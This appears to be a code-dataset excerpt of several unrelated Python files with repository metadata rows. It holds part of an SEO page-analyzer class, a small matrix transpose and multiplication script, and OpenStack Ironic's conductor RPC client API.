self.translation = bytes.maketrans(punctuation.encode('utf-8'), str(' ' * len(punctuation)).encode('utf-8'))
self.links = []
self.total_word_count = 0
self.wordcount = Counter()
self.bigrams = Counter()
self.trigrams = Counter()
self.stem_to_word = {}
self.content_hash = None
def talk(self):
"""
Returns a dictionary that can be printed
"""
return {
'url': self.url,
'title': self.title,
'description': self.description,
'word_count': self.total_word_count,
'keywords': self.sort_freq_dist(self.keywords, limit=5),
'bigrams': self.bigrams,
'trigrams': self.trigrams,
'warnings': self.warnings,
'content_hash': self.content_hash
}
def populate(self, bs):
"""
Populates the instance variables from BeautifulSoup
"""
try:
self.title = bs.title.text
except AttributeError:
self.title = 'No Title'
descr = bs.findAll('meta', attrs={'name': 'description'})
if len(descr) > 0:
self.description = descr[0].get('content')
keywords = bs.findAll('meta', attrs={'name': 'keywords'})
if len(keywords) > 0:
self.warn(f'Keywords should be avoided as they are a spam indicator and no longer used by Search Engines: {keywords}')
def analyze(self, raw_html=None):
"""
Analyze the page and populate the warnings list
"""
if not raw_html:
valid_prefixes = []
# only allow http:// https:// and //
for s in ['http://', 'https://', '//',]:
valid_prefixes.append(self.url.startswith(s))
if True not in valid_prefixes:
self.warn(f'{self.url} does not appear to have a valid protocol.')
return
if self.url.startswith('//'):
self.url = f'{self.base_domain.scheme}:{self.url}'
if self.parsed_url.netloc != self.base_domain.netloc:
self.warn(f'{self.url} is not part of {self.base_domain.netloc}.')
return
try:
page = http.get(self.url)
except HTTPError as e:
self.warn(f'Returned {e}')
return
encoding = 'ascii'
if 'content-type' in page.headers:
encoding = page.headers['content-type'].split('charset=')[-1]
if encoding.lower() not in ('text/html', 'text/plain', 'utf-8'):
# there is no unicode function in Python3
# try:
# raw_html = unicode(page.read(), encoding)
# except:
self.warn(f'Can not read {encoding}')
return
else:
raw_html = page.data.decode('utf-8')
self.content_hash = hashlib.sha1(raw_html.encode('utf-8')).hexdigest()
# remove comments, they screw with BeautifulSoup
clean_html = re.sub(r'<!--.*?-->', r'', raw_html, flags=re.DOTALL)
soup_lower = BeautifulSoup(clean_html.lower(), 'html.parser') #.encode('utf-8')
soup_unmodified = BeautifulSoup(clean_html, 'html.parser') #.encode('utf-8')
texts = soup_lower.findAll(text=True)
visible_text = [w for w in filter(self.visible_tags, texts)]
self.process_text(visible_text)
self.populate(soup_lower)
self.analyze_title()
self.analyze_description()
self.analyze_og(soup_lower)
self.analyze_a_tags(soup_unmodified)
self.analyze_img_tags(soup_lower)
self.analyze_h1_tags(soup_lower)
return True
def word_list_freq_dist(self, wordlist):
freq = [wordlist.count(w) for w in wordlist]
return dict(zip(wordlist, freq))
def sort_freq_dist(self, freqdist, limit=1):
aux = [(freqdist[key], self.stem_to_word[key]) for key in freqdist if freqdist[key] >= limit]
aux.sort()
aux.reverse()
return aux
def raw_tokenize(self, rawtext):
return TOKEN_REGEX.findall(rawtext.lower())
def tokenize(self, rawtext):
return [word for word in TOKEN_REGEX.findall(rawtext.lower()) if word not in ENGLISH_STOP_WORDS]
def getngrams(self, D, n=2):
return zip(*[D[i:] for i in range(n)])
def process_text(self, vt):
page_text = ''
for element in vt:
if element.strip():
page_text += element.strip().lower() + u' '
tokens = self.tokenize(page_text)
raw_tokens = self.raw_tokenize(page_text)
self.total_word_count = len(raw_tokens)
bigrams = self.getngrams(raw_tokens, 2)
for ng in bigrams:
vt = ' '.join(ng)
self.bigrams[vt] += 1
trigrams = self.getngrams(raw_tokens, 3)
for ng in trigrams:
vt = ' '.join(ng)
self.trigrams[vt] += 1
freq_dist = self.word_list_freq_dist(tokens)
for word in freq_dist:
root = stem(word)
cnt = freq_dist[word]
if root not in self.stem_to_word:
self.stem_to_word[root] = word
if root in self.wordcount:
self.wordcount[root] += cnt
else:
self.wordcount[root] = cnt
if root in self.keywords:
self.keywords[root] += cnt
else:
self.keywords[root] = cnt
def analyze_og(self, bs):
"""
Validate open graph tags
"""
og_title = bs.findAll('meta', attrs={'property': 'og:title'})
og_description = bs.findAll('meta', attrs={'property': 'og:description'})
og_image = bs.findAll('meta', attrs={'property': 'og:image'})
if len(og_title) == 0:
self.warn(u'Missing og:title')
if len(og_description) == 0:
self.warn(u'Missing og:description')
if len(og_image) == 0:
self.warn(u'Missing og:image')
def analyze_title(self):
"""
Validate the title
"""
# getting lazy, create a local variable so save having to
# type self.x a billion times
t = self.title
# calculate the length of the title once
length = len(t)
if length == 0:
self.warn(u'Missing title tag')
return
elif length < 10:
self.warn(u'Title tag length ({0}) is too short (less than 10 characters): {0}'.format(t))
elif length > 70:
self.warn(u'Title tag is too long (more than 70 characters): {0}'.format(t))
def analyze_description(self):
"""
Validate the description
"""
# getting lazy, create a local variable so save having to
# type self.x a billion times
d = self.description
# calculate the length of the description once
length = len(d)
if length == 0:
self.warn(u'Missing description')
return
elif length < 96:
self.warn(u'Description length ({0} characters) is too short (less than 96 characters): {1}'.format(length, d))
elif length < 120:
self.warn(u'Description length ({0} characters) may be too short (between 96 and 120 characters): {1}'.format(length, d))
elif length > 140:
self.warn(u'Description length ({0} characters) may be too long (between 120 and 140 characters): {1}'.format(length, d))
elif length > 255:
self.warn(u'Description length ({0} characters) is too long (more than 255 characters): {1}'.format(length, d))
def visible_tags(self, element):
if element.parent.name in ['style', 'script', '[document]']:
return False
return True
def analyze_img_tags(self, bs):
"""
Verifies that each img has an alt and title
"""
images = bs.find_all('img')
for image in images:
src = ''
if 'src' in image:
src = image['src']
elif 'data-src' in image:
src = image['data-src']
else:
src = image
if len(image.get('alt', '')) == 0:
self.warn('Image missing alt tag: {0}'.format(src))
def analyze_h1_tags(self, bs):
"""
Make sure each page has at least one H1 tag
"""
htags = bs.find_all('h1')
if len(htags) == 0:
self.warn('Each page should have at least one h1 tag')
def analyze_a_tags(self, bs):
"""
Add any new links (that we didn't find in the sitemap)
"""
anchors = bs.find_all('a', href=True)
for tag in anchors:
tag_href = tag['href']
tag_text = tag.text.lower().strip()
if len(tag.get('title', '')) == 0:
self.warn('Anchor missing title tag: {0}'.format(tag_href))
if tag_text in ['click here', 'page', 'article']:
self.warn('Anchor text contains generic text: {0}'.format(tag_text))
if self.base_domain.netloc not in tag_href and ':' in tag_href:
continue
modified_url = self.rel_to_abs_url(tag_href)
url_filename, url_file_extension = os.path.splitext(modified_url)
# ignore links to images
if url_file_extension in IMAGE_EXTENSIONS:
continue
# remove hash links to all urls
if '#' in modified_url:
modified_url = modified_url[:modified_url.rindex('#')]
self.links.append(modified_url)
def rel_to_abs_url(self, link):
if ':' in link:
return link
relative_path = link
domain = self.base_domain.netloc
if domain[-1] == '/':
domain = domain[:-1]
if len(relative_path) > 0 and relative_path[0] == '?':
if '?' in self.url:
return f'{self.url[:self.url.index("?")]}{relative_path}'
return f'{self.url}{relative_path}'
if len(relative_path) > 0 and relative_path[0] != '/':
relative_path = f'/{relative_path}'
return f'{self.base_domain.scheme}://{domain}{relative_path}'
def warn(self, warning):
self.warnings.append(warning)
| 35.67402 | 133 | 0.5528 |
7946362425e412552236a68c8b31bc939c7107a1 | 1,111 | py | Python | _drafts/Linalg/transponering.py | Andremartiny/AndreMartiny.github.io | 54d6ebadb735bc865ee152a59d6ee964a0cf9c0c | [
"MIT"
] | null | null | null | _drafts/Linalg/transponering.py | Andremartiny/AndreMartiny.github.io | 54d6ebadb735bc865ee152a59d6ee964a0cf9c0c | [
"MIT"
] | null | null | null | _drafts/Linalg/transponering.py | Andremartiny/AndreMartiny.github.io | 54d6ebadb735bc865ee152a59d6ee964a0cf9c0c | [
"MIT"
] | null | null | null | import numpy as np
def transp(matrise):
return [[matrise[rad][kol] for rad in range(len(matrise))] for kol in range(len(matrise[0]))]
def matrisemult(mat1,mat2):
# Bør sjekke om det går å multiplisere
mat1rad = len(mat1) # Antall rader i matrise 1
mat2kol = len(mat2[0]) # antall kolonner i matrise 2
if len(mat1[0]) != len(mat2): # sjekker om ant kol i mat1 == ant rader i mat2
return print("Ikke kompatible matriser")
resultat = [[] for i in range(mat1rad)]
for k in range(mat1rad):
for j in range(mat2kol):
komponent = 0
for i in range(len(mat1[0])):
komponent += mat1[k][i]*mat2[i][j]
resultat[k].append(komponent)
return resultat
#matrise = [ [2,3,4,5,6], [6,7,8,9,10]
#]
#matrise2 = [[11,-12], [-21,22],[-31,32],[31,-32],[41,-42], [51,-52]
#]
matrise = [[1,2],[2,3],[4,5]]
matrise2 = [[0,0,1],[1,0,0],[0,0,1]]
matrise3 = [
[1,0,0,1],
[0,1,0,2],
]
print(np.matrix(matrise))
print("\n")
print(np.matrix((matrise3)))
print("\n")
print(np.matrix(matrisemult(matrise,matrise3))) | 25.837209 | 97 | 0.577858 |
794636c5f95c48bcef1ee289d825f60c761f942b | 33,407 | py | Python | ironic/conductor/rpcapi.py | pyrrrat/moved-ironic | 93331da82ef13490ccf08f8f9c370e81ca176a41 | [
"Apache-2.0"
] | null | null | null | ironic/conductor/rpcapi.py | pyrrrat/moved-ironic | 93331da82ef13490ccf08f8f9c370e81ca176a41 | [
"Apache-2.0"
] | null | null | null | ironic/conductor/rpcapi.py | pyrrrat/moved-ironic | 93331da82ef13490ccf08f8f9c370e81ca176a41 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Client side of the conductor RPC API.
"""
import random
import oslo_messaging as messaging
from ironic.common import exception
from ironic.common import hash_ring
from ironic.common.i18n import _
from ironic.common import rpc
from ironic.conductor import manager
from ironic.objects import base as objects_base
class ConductorAPI(object):
"""Client side of the conductor RPC API.
API version history:
| 1.0 - Initial version.
| Included get_node_power_status
| 1.1 - Added update_node and start_power_state_change.
| 1.2 - Added vendor_passthru.
| 1.3 - Rename start_power_state_change to change_node_power_state.
| 1.4 - Added do_node_deploy and do_node_tear_down.
| 1.5 - Added validate_driver_interfaces.
| 1.6 - change_node_power_state, do_node_deploy and do_node_tear_down
| accept node id instead of node object.
| 1.7 - Added topic parameter to RPC methods.
| 1.8 - Added change_node_maintenance_mode.
| 1.9 - Added destroy_node.
| 1.10 - Remove get_node_power_state
| 1.11 - Added get_console_information, set_console_mode.
| 1.12 - validate_vendor_action, do_vendor_action replaced by single
| vendor_passthru method.
| 1.13 - Added update_port.
| 1.14 - Added driver_vendor_passthru.
| 1.15 - Added rebuild parameter to do_node_deploy.
| 1.16 - Added get_driver_properties.
| 1.17 - Added set_boot_device, get_boot_device and
| get_supported_boot_devices.
| 1.18 - Remove change_node_maintenance_mode.
| 1.19 - Change return value of vendor_passthru and
| driver_vendor_passthru
| 1.20 - Added http_method parameter to vendor_passthru and
| driver_vendor_passthru
| 1.21 - Added get_node_vendor_passthru_methods and
| get_driver_vendor_passthru_methods
| 1.22 - Added configdrive parameter to do_node_deploy.
| 1.23 - Added do_provisioning_action
| 1.24 - Added inspect_hardware method
| 1.25 - Added destroy_port
| 1.26 - Added continue_node_clean
| 1.27 - Convert continue_node_clean to cast
| 1.28 - Change exceptions raised by destroy_node
| 1.29 - Change return value of vendor_passthru and
| driver_vendor_passthru to a dictionary
| 1.30 - Added set_target_raid_config and
| get_raid_logical_disk_properties
| 1.31 - Added Versioned Objects indirection API methods:
| object_class_action_versions, object_action and
| object_backport_versions
| 1.32 - Add do_node_clean
| 1.33 - Added update and destroy portgroup.
"""
# NOTE(rloo): This must be in sync with manager.ConductorManager's.
RPC_API_VERSION = '1.33'
def __init__(self, topic=None):
super(ConductorAPI, self).__init__()
self.topic = topic
if self.topic is None:
self.topic = manager.MANAGER_TOPIC
target = messaging.Target(topic=self.topic,
version='1.0')
serializer = objects_base.IronicObjectSerializer()
self.client = rpc.get_client(target,
version_cap=self.RPC_API_VERSION,
serializer=serializer)
# NOTE(deva): this is going to be buggy
self.ring_manager = hash_ring.HashRingManager()
def get_topic_for(self, node):
"""Get the RPC topic for the conductor service the node is mapped to.
:param node: a node object.
:returns: an RPC topic string.
:raises: NoValidHost
"""
self.ring_manager.reset()
try:
ring = self.ring_manager[node.driver]
dest = ring.get_hosts(node.uuid)
return self.topic + "." + dest[0]
except exception.DriverNotFound:
reason = (_('No conductor service registered which supports '
'driver %s.') % node.driver)
raise exception.NoValidHost(reason=reason)
def get_topic_for_driver(self, driver_name):
"""Get RPC topic name for a conductor supporting the given driver.
The topic is used to route messages to the conductor supporting
the specified driver. A conductor is selected at random from the
set of qualified conductors.
:param driver_name: the name of the driver to route to.
:returns: an RPC topic string.
:raises: DriverNotFound
"""
self.ring_manager.reset()
hash_ring = self.ring_manager[driver_name]
host = random.choice(list(hash_ring.hosts))
return self.topic + "." + host
def update_node(self, context, node_obj, topic=None):
"""Synchronously, have a conductor update the node's information.
Update the node's information in the database and return a node object.
The conductor will lock the node while it validates the supplied
information. If driver_info is passed, it will be validated by
the core drivers. If instance_uuid is passed, it will be set or unset
only if the node is properly configured.
Note that power_state should not be passed via this method.
Use change_node_power_state for initiating driver actions.
:param context: request context.
:param node_obj: a changed (but not saved) node object.
:param topic: RPC topic. Defaults to self.topic.
:returns: updated node object, including all fields.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.1')
return cctxt.call(context, 'update_node', node_obj=node_obj)
def change_node_power_state(self, context, node_id, new_state, topic=None):
"""Change a node's power state.
Synchronously, acquire lock and start the conductor background task
to change power state of a node.
:param context: request context.
:param node_id: node id or uuid.
:param new_state: one of ironic.common.states power state values
:param topic: RPC topic. Defaults to self.topic.
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.6')
return cctxt.call(context, 'change_node_power_state', node_id=node_id,
new_state=new_state)
def vendor_passthru(self, context, node_id, driver_method, http_method,
info, topic=None):
"""Receive requests for vendor-specific actions.
Synchronously validate driver specific info or get driver status,
and if successful invokes the vendor method. If the method mode
is async the conductor will start background worker to perform
vendor action.
:param context: request context.
:param node_id: node id or uuid.
:param driver_method: name of method for driver.
:param http_method: the HTTP method used for the request.
:param info: info for node driver.
:param topic: RPC topic. Defaults to self.topic.
:raises: InvalidParameterValue if supplied info is not valid.
:raises: MissingParameterValue if a required parameter is missing
:raises: UnsupportedDriverExtension if current driver does not have
vendor interface.
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
:raises: NodeLocked if node is locked by another conductor.
:returns: A dictionary containing:
:return: The response of the invoked vendor method
:async: Boolean value. Whether the method was invoked
asynchronously (True) or synchronously (False). When invoked
asynchronously the response will be always None.
:attach: Boolean value. Whether to attach the response of
the invoked vendor method to the HTTP response object (True)
or return it in the response body (False).
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.20')
return cctxt.call(context, 'vendor_passthru', node_id=node_id,
driver_method=driver_method,
http_method=http_method,
info=info)
def driver_vendor_passthru(self, context, driver_name, driver_method,
http_method, info, topic=None):
"""Pass vendor-specific calls which don't specify a node to a driver.
Handles driver-level vendor passthru calls. These calls don't
require a node UUID and are executed on a random conductor with
the specified driver. If the method mode is async the conductor
will start background worker to perform vendor action.
:param context: request context.
:param driver_name: name of the driver on which to call the method.
:param driver_method: name of the vendor method, for use by the driver.
:param http_method: the HTTP method used for the request.
:param info: data to pass through to the driver.
:param topic: RPC topic. Defaults to self.topic.
:raises: InvalidParameterValue for parameter errors.
:raises: MissingParameterValue if a required parameter is missing
:raises: UnsupportedDriverExtension if the driver doesn't have a vendor
interface, or if the vendor interface does not support the
specified driver_method.
:raises: DriverNotFound if the supplied driver is not loaded.
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
:returns: A dictionary containing:
:return: The response of the invoked vendor method
:async: Boolean value. Whether the method was invoked
asynchronously (True) or synchronously (False). When invoked
asynchronously the response will be always None.
:attach: Boolean value. Whether to attach the response of
the invoked vendor method to the HTTP response object (True)
or return it in the response body (False).
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.20')
return cctxt.call(context, 'driver_vendor_passthru',
driver_name=driver_name,
driver_method=driver_method,
http_method=http_method,
info=info)
def get_node_vendor_passthru_methods(self, context, node_id, topic=None):
"""Retrieve information about vendor methods of the given node.
:param context: an admin context.
:param node_id: the id or uuid of a node.
:param topic: RPC topic. Defaults to self.topic.
:returns: dictionary of <method name>:<method metadata> entries.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.21')
return cctxt.call(context, 'get_node_vendor_passthru_methods',
node_id=node_id)
def get_driver_vendor_passthru_methods(self, context, driver_name,
topic=None):
"""Retrieve information about vendor methods of the given driver.
:param context: an admin context.
:param driver_name: name of the driver.
:param topic: RPC topic. Defaults to self.topic.
:returns: dictionary of <method name>:<method metadata> entries.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.21')
return cctxt.call(context, 'get_driver_vendor_passthru_methods',
driver_name=driver_name)
def do_node_deploy(self, context, node_id, rebuild, configdrive,
topic=None):
"""Signal to conductor service to perform a deployment.
:param context: request context.
:param node_id: node id or uuid.
:param rebuild: True if this is a rebuild request.
:param configdrive: A gzipped and base64 encoded configdrive.
:param topic: RPC topic. Defaults to self.topic.
:raises: InstanceDeployFailure
:raises: InvalidParameterValue if validation fails
:raises: MissingParameterValue if a required parameter is missing
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
The node must already be configured and in the appropriate
undeployed state before this method is called.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.22')
return cctxt.call(context, 'do_node_deploy', node_id=node_id,
rebuild=rebuild, configdrive=configdrive)
def do_node_tear_down(self, context, node_id, topic=None):
"""Signal to conductor service to tear down a deployment.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:raises: InstanceDeployFailure
:raises: InvalidParameterValue if validation fails
:raises: MissingParameterValue if a required parameter is missing
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
The node must already be configured and in the appropriate
deployed state before this method is called.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.6')
return cctxt.call(context, 'do_node_tear_down', node_id=node_id)
def do_provisioning_action(self, context, node_id, action, topic=None):
"""Signal to conductor service to perform the given action on a node.
:param context: request context.
:param node_id: node id or uuid.
:param action: an action. One of ironic.common.states.VERBS
:param topic: RPC topic. Defaults to self.topic.
:raises: InvalidParameterValue
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
:raises: InvalidStateRequested if the requested action can not
be performed.
This encapsulates some provisioning actions in a single call.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.23')
return cctxt.call(context, 'do_provisioning_action',
node_id=node_id, action=action)
def continue_node_clean(self, context, node_id, topic=None):
"""Signal to conductor service to start the next cleaning action.
NOTE(JoshNang) this is an RPC cast, there will be no response or
exception raised by the conductor for this RPC.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.27')
return cctxt.cast(context, 'continue_node_clean',
node_id=node_id)
def validate_driver_interfaces(self, context, node_id, topic=None):
"""Validate the `core` and `standardized` interfaces for drivers.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:returns: a dictionary containing the results of each
interface validation.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.5')
return cctxt.call(context, 'validate_driver_interfaces',
node_id=node_id)
def destroy_node(self, context, node_id, topic=None):
"""Delete a node.
:param context: request context.
:param node_id: node id or uuid.
:raises: NodeLocked if node is locked by another conductor.
:raises: NodeAssociated if the node contains an instance
associated with it.
:raises: InvalidState if the node is in the wrong provision
state to perform deletion.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.9')
return cctxt.call(context, 'destroy_node', node_id=node_id)
def get_console_information(self, context, node_id, topic=None):
"""Get connection information about the console.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support console.
:raises: InvalidParameterValue when the wrong driver info is specified.
:raises: MissingParameterValue if a required parameter is missing
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.11')
return cctxt.call(context, 'get_console_information', node_id=node_id)
def set_console_mode(self, context, node_id, enabled, topic=None):
"""Enable/Disable the console.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:param enabled: Boolean value; whether the console is enabled or
disabled.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support console.
:raises: InvalidParameterValue when the wrong driver info is specified.
:raises: MissingParameterValue if a required parameter is missing
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.11')
return cctxt.call(context, 'set_console_mode', node_id=node_id,
enabled=enabled)
def update_port(self, context, port_obj, topic=None):
"""Synchronously, have a conductor update the port's information.
Update the port's information in the database and return a port object.
The conductor will lock related node and trigger specific driver
actions if they are needed.
:param context: request context.
:param port_obj: a changed (but not saved) port object.
:param topic: RPC topic. Defaults to self.topic.
:returns: updated port object, including all fields.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.13')
return cctxt.call(context, 'update_port', port_obj=port_obj)
def update_portgroup(self, context, portgroup_obj, topic=None):
"""Synchronously, have a conductor update the portgroup's information.
Update the portgroup's information in the database and return a
portgroup object.
The conductor will lock related node and trigger specific driver
actions if they are needed.
:param context: request context.
:param portgroup_obj: a changed (but not saved) portgroup object.
:param topic: RPC topic. Defaults to self.topic.
:returns: updated portgroup object, including all fields.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.33')
return cctxt.call(context, 'update_portgroup',
portgroup_obj=portgroup_obj)
def destroy_portgroup(self, context, portgroup, topic=None):
"""Delete a portgroup.
:param context: request context.
:param portgroup: portgroup object
:param topic: RPC topic. Defaults to self.topic.
:raises: NodeLocked if node is locked by another conductor.
:raises: NodeNotFound if the node associated with the portgroup does
not exist.
:raises: PortgroupNotEmpty if portgroup is not empty
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.33')
return cctxt.call(context, 'destroy_portgroup', portgroup=portgroup)
def get_driver_properties(self, context, driver_name, topic=None):
"""Get the properties of the driver.
:param context: request context.
:param driver_name: name of the driver.
:param topic: RPC topic. Defaults to self.topic.
:returns: a dictionary with <property name>:<property description>
entries.
:raises: DriverNotFound.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.16')
return cctxt.call(context, 'get_driver_properties',
driver_name=driver_name)
def set_boot_device(self, context, node_id, device, persistent=False,
topic=None):
"""Set the boot device for a node.
Set the boot device to use on next reboot of the node. Be aware
that not all drivers support this.
:param context: request context.
:param node_id: node id or uuid.
:param device: the boot device, one of
:mod:`ironic.common.boot_devices`.
:param persistent: Whether to set next-boot, or make the change
permanent. Default: False.
:raises: NodeLocked if node is locked by another conductor.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support management.
:raises: InvalidParameterValue when the wrong driver info is
specified or an invalid boot device is specified.
:raises: MissingParameterValue if missing supplied info.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.17')
return cctxt.call(context, 'set_boot_device', node_id=node_id,
device=device, persistent=persistent)
def get_boot_device(self, context, node_id, topic=None):
"""Get the current boot device.
Returns the current boot device of a node.
:param context: request context.
:param node_id: node id or uuid.
:raises: NodeLocked if node is locked by another conductor.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support management.
:raises: InvalidParameterValue when the wrong driver info is
specified.
:raises: MissingParameterValue if missing supplied info.
:returns: a dictionary containing:
:boot_device: the boot device, one of
:mod:`ironic.common.boot_devices` or None if it is unknown.
:persistent: Whether the boot device will persist to all
future boots or not, None if it is unknown.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.17')
return cctxt.call(context, 'get_boot_device', node_id=node_id)
def get_supported_boot_devices(self, context, node_id, topic=None):
"""Get the list of supported devices.
Returns the list of supported boot devices of a node.
:param context: request context.
:param node_id: node id or uuid.
:raises: NodeLocked if node is locked by another conductor.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support management.
:raises: InvalidParameterValue when the wrong driver info is
specified.
:raises: MissingParameterValue if missing supplied info.
:returns: A list with the supported boot devices defined
in :mod:`ironic.common.boot_devices`.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.17')
return cctxt.call(context, 'get_supported_boot_devices',
node_id=node_id)
def inspect_hardware(self, context, node_id, topic=None):
"""Signals the conductor service to perform hardware introspection.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:raises: NodeLocked if node is locked by another conductor.
:raises: HardwareInspectionFailure
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support inspection.
:raises: InvalidStateRequested if 'inspect' is not a valid
action to do in the current state.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.24')
return cctxt.call(context, 'inspect_hardware', node_id=node_id)
def destroy_port(self, context, port, topic=None):
"""Delete a port.
:param context: request context.
:param port: port object
:param topic: RPC topic. Defaults to self.topic.
:raises: NodeLocked if node is locked by another conductor.
:raises: NodeNotFound if the node associated with the port does not
exist.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.25')
return cctxt.call(context, 'destroy_port', port=port)
def set_target_raid_config(self, context, node_id, target_raid_config,
topic=None):
"""Stores the target RAID configuration on the node.
Stores the target RAID configuration on node.target_raid_config
:param context: request context.
:param node_id: node id or uuid.
:param target_raid_config: Dictionary containing the target RAID
configuration. It may be an empty dictionary as well.
:param topic: RPC topic. Defaults to self.topic.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support RAID configuration.
:raises: InvalidParameterValue, if validation of target raid config
fails.
:raises: MissingParameterValue, if some required parameters are
missing.
:raises: NodeLocked if node is locked by another conductor.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.30')
return cctxt.call(context, 'set_target_raid_config',
node_id=node_id,
target_raid_config=target_raid_config)
def get_raid_logical_disk_properties(self, context, driver_name,
topic=None):
"""Get the logical disk properties for RAID configuration.
Gets the information about logical disk properties which can
be specified in the input RAID configuration.
:param context: request context.
:param driver_name: name of the driver
:param topic: RPC topic. Defaults to self.topic.
:raises: UnsupportedDriverExtension if the driver doesn't
support RAID configuration.
:returns: A dictionary containing the properties that can be mentioned
for logical disks and a textual description for them.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.30')
return cctxt.call(context, 'get_raid_logical_disk_properties',
driver_name=driver_name)
def do_node_clean(self, context, node_id, clean_steps, topic=None):
"""Signal to conductor service to perform manual cleaning on a node.
:param context: request context.
:param node_id: node ID or UUID.
:param clean_steps: a list of clean step dictionaries.
:param topic: RPC topic. Defaults to self.topic.
:raises: InvalidParameterValue if validation of power driver interface
failed.
:raises: InvalidStateRequested if cleaning can not be performed.
:raises: NodeInMaintenance if node is in maintenance mode.
:raises: NodeLocked if node is locked by another conductor.
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.32')
return cctxt.call(context, 'do_node_clean',
node_id=node_id, clean_steps=clean_steps)
def object_class_action_versions(self, context, objname, objmethod,
object_versions, args, kwargs):
"""Perform an action on a VersionedObject class.
We want any conductor to handle this, so it is intentional that there
is no topic argument for this method.
:param context: The context within which to perform the action
:param objname: The registry name of the object
:param objmethod: The name of the action method to call
:param object_versions: A dict of {objname: version} mappings
:param args: The positional arguments to the action method
:param kwargs: The keyword arguments to the action method
:raises: NotImplementedError when an operator makes an error during
upgrade
:returns: The result of the action method, which may (or may not)
be an instance of the implementing VersionedObject class.
"""
if not self.client.can_send_version('1.31'):
raise NotImplementedError(_('Incompatible conductor version - '
'please upgrade ironic-conductor '
'first'))
cctxt = self.client.prepare(topic=self.topic, version='1.31')
return cctxt.call(context, 'object_class_action_versions',
objname=objname, objmethod=objmethod,
object_versions=object_versions,
args=args, kwargs=kwargs)
def object_action(self, context, objinst, objmethod, args, kwargs):
"""Perform an action on a VersionedObject instance.
We want any conductor to handle this, so it is intentional that there
is no topic argument for this method.
:param context: The context within which to perform the action
:param objinst: The object instance on which to perform the action
:param objmethod: The name of the action method to call
:param args: The positional arguments to the action method
:param kwargs: The keyword arguments to the action method
:raises: NotImplementedError when an operator makes an error during
upgrade
:returns: A tuple with the updates made to the object and
the result of the action method
"""
if not self.client.can_send_version('1.31'):
raise NotImplementedError(_('Incompatible conductor version - '
'please upgrade ironic-conductor '
'first'))
cctxt = self.client.prepare(topic=self.topic, version='1.31')
return cctxt.call(context, 'object_action', objinst=objinst,
objmethod=objmethod, args=args, kwargs=kwargs)
def object_backport_versions(self, context, objinst, object_versions):
"""Perform a backport of an object instance.
The default behavior of the base VersionedObjectSerializer, upon
receiving an object with a version newer than what is in the local
registry, is to call this method to request a backport of the object.
We want any conductor to handle this, so it is intentional that there
is no topic argument for this method.
:param context: The context within which to perform the backport
:param objinst: An instance of a VersionedObject to be backported
:param object_versions: A dict of {objname: version} mappings
:raises: NotImplementedError when an operator makes an error during
upgrade
:returns: The downgraded instance of objinst
"""
if not self.client.can_send_version('1.31'):
raise NotImplementedError(_('Incompatible conductor version - '
'please upgrade ironic-conductor '
'first'))
cctxt = self.client.prepare(topic=self.topic, version='1.31')
return cctxt.call(context, 'object_backport_versions', objinst=objinst,
object_versions=object_versions)
| 46.078621 | 79 | 0.64723 |
7946374e036143a05e6a4b7e8aa1ef97ad901fad | 1,330 | py | Python | thewegmenu/utils/wegmans_utils.py | jzaia18/TheWegMenu | 2cef89bc9b881be37c2a54c1ff4ac52ee4c4b530 | [
